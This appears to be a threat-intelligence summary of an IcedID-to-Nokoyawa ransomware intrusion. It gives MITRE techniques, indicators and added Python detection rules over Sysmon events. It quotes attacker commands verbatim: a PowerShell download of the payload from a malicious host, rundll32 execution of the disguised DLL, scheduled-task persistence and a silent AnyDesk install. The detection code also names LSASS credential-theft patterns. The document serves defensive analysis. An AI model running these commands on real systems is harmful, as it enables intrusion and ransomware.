Keypoints
- Initial access via phishing emails carrying a OneNote file that hid and executed a batch file (O p e n.cmd) to run PowerShell and download an IcedID DLL disguised as an image.
- IcedID executed via rundll32, created persistence with a scheduled task, and beaconed to multiple C2 domains (including aerilaponawki[.]com) for over 30 days before further activity.
- On day 33 the IcedID implant dropped Cobalt Strike beacons (DLL/EXE) which used default named pipes and performed process injection and Active Directory discovery with AdFind.
- Threat actors installed AnyDesk (silent/service install) for interactive access, used RDP for lateral movement, and deployed Cobalt Strike and installers via Internet Explorer downloads.
- FileZilla was used to exfiltrate data over SFTP to 45.155.204.5 before deploying Nokoyawa ransomware to a file server and a backup server, using Unlocker/ProcessHacker to bypass file locks.
- Detections observed: ET MALWARE Win32/IcedID Request Cookie, Cobalt Strike malleable profile hits, Sysmon events for named pipe creation and LSASS access, and artifacts from AnyDesk/FileZilla installations.
MITRE Techniques
- [T1566] Phishing – Initial access via phishing emails that distributed malicious OneNote attachments.
- [T1204.002] Malicious File – OneNote triggered execution of a batch file which ran PowerShell to download the IcedID DLL: 'powershell invoke-webrequest -uri http://mrassociattes.com/images/62.gif -outfile c:\programdata\COIm.jpg'.
- [T1218.011] Rundll32 – IcedID DLL executed using rundll32: 'rundll32 c:\programdata\COIm.jpg,init'.
- [T1053.005] Scheduled Task – Persistence achieved via a scheduled task executing the IcedID DLL at logon: 'rundll32.exe "C:\Users\[REDACTED]\AppData\Roaming\[REDACTED]\Cadiak.dll",init --od="DeskBlouse\license.dat"'.
- [T1036.008] Masquerade File Type – Malware DLL was named with an image extension to evade detection (e.g., ‘COIm.jpg’ actually a DLL).
- [T1105] Ingress Tool Transfer – Cobalt Strike beacons and other tooling were downloaded onto hosts via Internet Explorer (e.g., ‘91.215.85[.]183/download/csrss.exe’).
- [T1055] Process Injection – Cobalt Strike performed process injection into svchost.exe and created anomalous parent/child relationships with cmd.exe.
- [T1003.001] LSASS Memory – Credential access achieved by accessing and creating a remote thread in lsass.exe from rundll32.exe: ‘Process accessed: SourceImage: …rundll32.exe TargetImage: …lsass.exe’.
- [T1021.001] Remote Services (RDP) – Lateral movement using RDP from the beachhead to backup and file servers.
- [T1219] Remote Access Software – AnyDesk installed silently as a service for interactive remote control: 'AnyDesk.exe --install C:\ProgramData\Any --start-with-win --silent'.
- [T1048] Exfiltration Over Alternative Protocol – Data exfiltration performed via FileZilla SFTP to 45.155.204.5.
- [T1486] Data Encrypted for Impact – Final impact by deploying Nokoyawa ransomware with a config for encryption and deletion of shadows: ‘DELETE_SHADOW: true’.
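The delivery chain in the technique list above (OneNote spawning cmd/PowerShell, a download written with an image extension, rundll32 loading a non-DLL module, a silent AnyDesk install) can be turned into process-creation detections. The following is an added example, not code from the report or its authors: it runs four rules over Sysmon Event ID 1 style records. The field names follow the Sysmon schema, the sample records are constructed for this example, and the interpreter list goes slightly beyond the page by also covering wscript/cscript/mshta as OneNote children.

```python
"""Added example: flag the IcedID delivery chain over Sysmon EID 1 records.

The records below are constructed for this example (not from the report);
field names follow the Sysmon ProcessCreate schema.
"""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Extensions rundll32 legitimately loads; anything else (e.g. .jpg) is flagged.
RUNDLL32_OK_EXTS = {".dll", ".cpl", ".ax", ".ocx"}
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
# Script hosts a OneNote process should not be spawning (assumed list).
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# rundll32 [<module>|"<module>"],<entry> ... : capture the module before the comma.
_RUNDLL32_MODULE = re.compile(r'\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+("([^"]+)"|[^\s,]+)', re.I)
_PS_DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring", re.I)
_PS_OUTFILE = re.compile(r'-outfile\s+"?([^"\s]+)', re.I)

# Constructed sample telemetry mirroring the chain described on the page.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "C:\Users\alice\AppData\Local\Temp\OneNote\16.0\NT\0\O p e n.cmd"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell invoke-webrequest -uri http://mrassociattes.com/images/62.gif -outfile c:\programdata\COIm.jpg"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 c:\programdata\COIm.jpg,init"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\alice\Downloads\AnyDesk.exe",
     "CommandLine": r"AnyDesk.exe --install C:\ProgramData\Any --start-with-win --silent"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign control record
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]


def base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def rundll32_module(cmd: str) -> Optional[str]:
    """Return the module rundll32 was asked to load (the part before ',entry'), or None."""
    m = _RUNDLL32_MODULE.match(cmd)
    if not m:
        return None
    return m.group(2) or m.group(1)


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every record that matches a rule."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        parent, image, cmd = base(ev["ParentImage"]), base(ev["Image"]), ev["CommandLine"]
        if parent == "onenote.exe" and image in INTERPRETERS:
            hits.append(("onenote_spawns_interpreter", cmd))
        if image == "powershell.exe" and _PS_DOWNLOAD.search(cmd):
            out = _PS_OUTFILE.search(cmd)
            if out and ntpath.splitext(out.group(1))[1].lower() in IMAGE_EXTS:
                hits.append(("powershell_download_image_ext", cmd))
        if image == "rundll32.exe":
            module = rundll32_module(cmd)
            if module is not None and ntpath.splitext(module)[1].lower() not in RUNDLL32_OK_EXTS:
                hits.append(("rundll32_non_dll_module", cmd))
        if image == "anydesk.exe" and "--install" in cmd.lower() and "--silent" in cmd.lower():
            hits.append(("anydesk_silent_install", cmd))
    return hits


if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

The rundll32 rule keys on the module's extension rather than on a file name, so a renamed payload such as COIm.jpg is caught wherever it lands; the benign shell32.dll control record produces no hit.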
Indicators of Compromise
- [Domain] IcedID/C2 and payload hosting – aerilaponawki[.]com, mrassociattes[.]com (download URL for IcedID payload).
- [Domain] Cobalt Strike C2 – msc-mvc-updates[.]com (91.215.85.183) used to host Cobalt Strike beacons.
- [IP] Exfiltration server – 45.155.204.5 (SSH/FileZilla SFTP destination, observed SSH hash c561c2cd…), and C2 IP 193.149.129.131 (aerilaponawki[.]com).
- [File name] Delivered/malicious files – COIm.jpg (IcedID DLL disguised as JPG), O p e n.cmd (OneNote-launched batch file), and INSTALL.ps1 (AnyDesk installer script).
- [Hashes] Example file hashes – COIm.jpg: d1da347e78bf043e2dc61638e946c3da, agaloz.dll: 76a1f94ed6499b99d2cc500998846875, and 5 more hashes.
The attack flow began with a OneNote attachment that hid a batch file; when opened the batch executed PowerShell to download a DLL named as an image (COIm.jpg) and executed it via rundll32, which immediately beaconed to IcedID C2 domains (e.g., aerilaponawki[.]com) and dropped IcedID components (Cadiak.dll and license.dat). IcedID created persistence with a scheduled task and maintained stealthy beaconing for over three weeks before receiving commands to download additional tooling.
On day 33 the IcedID implant delivered Cobalt Strike beacons (DLL and EXE variants) executed via regsvr32 and direct launches; these beacons created default named pipes (e.g., postex_*) and performed process injection into svchost.exe, AD enumeration with AdFind, and hands-on reconnaissance via AnyDesk after the actor installed AnyDesk silently (AnyDesk.exe --install … --start-with-win --silent). The operators used RDP for lateral movement, downloaded Cobalt Strike payloads through Internet Explorer (91.215.85[.]183/download/csrss.exe), and executed INSTALL.ps1 to persist AnyDesk across hosts.
After interactive access they used SoftPerfect NetScan and nslookup scripts to map hosts and ports, browsed file shares for sensitive documents, then installed FileZilla on a file server to exfiltrate data to 45.155.204.5 via SFTP. Following exfiltration they deployed Nokoyawa ransomware to the file and backup servers (dropping svchost.exe and a .bat automation script with a base64 config specifying NOTE_NAME and DELETE_SHADOW:true), used Unlocker/ProcessHacker to address file locks, uninstalled FileZilla to remove traces, and executed the ransomware to encrypt the two servers.
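The post-exploitation telemetry the report highlights (Sysmon named pipe creation for the default Cobalt Strike pipes, and rundll32.exe accessing and creating a remote thread in lsass.exe) maps to three Sysmon event types. The code below is an added example, not from the report or its authors: it evaluates Event ID 10 (ProcessAccess), 8 (CreateRemoteThread) and 17 (PipeEvent) records. The lsass source allowlist is an assumption to tune per environment, the sample events are constructed, and the pipe patterns are Cobalt Strike's documented Malleable C2 defaults (postex_, msagent_, MSSE-*-server), which goes slightly beyond the postex_ example on the page.

```python
"""Added example: Sysmon-based detection of LSASS access and default
Cobalt Strike pipe names. Sample records are constructed, not from the report.
"""
import ntpath
import re
from typing import Dict, List

# Access-mask bits that matter for credential theft (Windows PROCESS_* rights).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010

# Assumed allowlist: processes that legitimately open lsass.exe on this estate.
LSASS_ALLOWED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe", "taskmgr.exe"}

# Cobalt Strike default pipe names as Sysmon EID 17 reports them (leading backslash).
DEFAULT_CS_PIPES = [
    re.compile(r"^\\postex_[0-9a-f]{4}$", re.I),
    re.compile(r"^\\msagent_[0-9a-f]{2}$", re.I),
    re.compile(r"^\\MSSE-\d+-server$", re.I),
]

RUNDLL32 = r"C:\Windows\System32\rundll32.exe"
LSASS = r"C:\Windows\System32\lsass.exe"

# Constructed sample telemetry; only some records should alert.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 10, "SourceImage": RUNDLL32, "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF"},                      # allowlisted source
    {"EventID": 10, "SourceImage": RUNDLL32, "TargetImage": LSASS, "GrantedAccess": "0x1000"},  # query only
    {"EventID": 8, "SourceImage": RUNDLL32, "TargetImage": LSASS, "StartAddress": "0x7FF6A1B20000"},
    {"EventID": 17, "Image": RUNDLL32, "PipeName": r"\postex_a3f1"},
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\MSSE-4531-server"},
    {"EventID": 17, "Image": r"C:\Program Files\Foo\foo.exe", "PipeName": r"\foo_updater"},  # benign
]


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def suspicious_lsass_access(ev: Dict) -> bool:
    """EID 10: non-allowlisted source opening lsass with read or thread rights."""
    if base(ev.get("TargetImage", "")) != "lsass.exe":
        return False
    if base(ev["SourceImage"]) in LSASS_ALLOWED_SOURCES:
        return False
    access = int(ev["GrantedAccess"], 16)  # Sysmon logs the mask as a hex string
    return bool(access & (PROCESS_VM_READ | PROCESS_CREATE_THREAD))


def default_cs_pipe(name: str) -> bool:
    """True if the pipe name matches one of the Cobalt Strike defaults."""
    return any(p.match(name) for p in DEFAULT_CS_PIPES)


def detect(events: List[Dict]) -> List[Dict]:
    """Return one alert dict per matching record, in input order."""
    alerts: List[Dict] = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 10 and suspicious_lsass_access(ev):
            alerts.append({"rule": "lsass_access", "image": ev["SourceImage"],
                           "access": ev["GrantedAccess"]})
        elif eid == 8 and base(ev["TargetImage"]) == "lsass.exe":
            # Any remote thread into lsass is worth an alert regardless of source.
            alerts.append({"rule": "lsass_remote_thread", "image": ev["SourceImage"]})
        elif eid == 17 and default_cs_pipe(ev["PipeName"]):
            alerts.append({"rule": "cobalt_strike_default_pipe", "image": ev["Image"],
                           "pipe": ev["PipeName"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The access-mask check keeps a rundll32 process that merely queries lsass (0x1000) out of the alert stream while still catching the full-access 0x1FFFFF handle seen in the intrusion; the pipe patterns are anchored so that an operator who renames the pipe in a custom profile will not match them, which is why the rule is a complement to, not a replacement for, the ET MALWARE and malleable-profile network signatures listed in the key points.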
Read more: https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/